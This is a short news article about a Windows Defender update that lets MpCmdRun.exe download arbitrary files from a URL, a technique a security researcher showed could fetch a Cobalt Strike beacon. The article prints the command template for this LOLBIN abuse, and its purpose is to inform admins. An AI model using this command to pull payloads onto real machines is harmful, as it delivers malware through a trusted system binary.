However, in one of its new updates, the mighty antivirus got a new DownloadFile command, that will allow anyone to download any file from an URL to a certain path on your computer. We can call this an exploit since it could also be used to even download malware, a thing that was discovered by security researcher Mohammad Askar who posted his finding on Twitter.
How can Windows Defender be used to download malware?
It’s really simple to use the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) to download any file from an external source to your computer. MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file] In his try, Askar was able to download Cobalt Strike beacon, a well-known attacker tool using this command line. The new command is included in version 4.18.2007.8-0 and up which gives a pretty good start time for attackers. Basically, this feature turns Windows Defender into a LOLBIN (living off the line binaries), a harmless system file that can be used for malicious purposes. Fortunately, after you download the harmful file, it will be detected by the same Windows Defender or by another antivirus software if present. From a reliable protection software, Windows Defender turned into another possible threat that will have to be closely monitored by admins and security experts. If you have any suggestions or comments, please leave them below in the Comments section.
Name *
Email *
Commenting as . Not you?
Save information for future comments
Comment
Δ
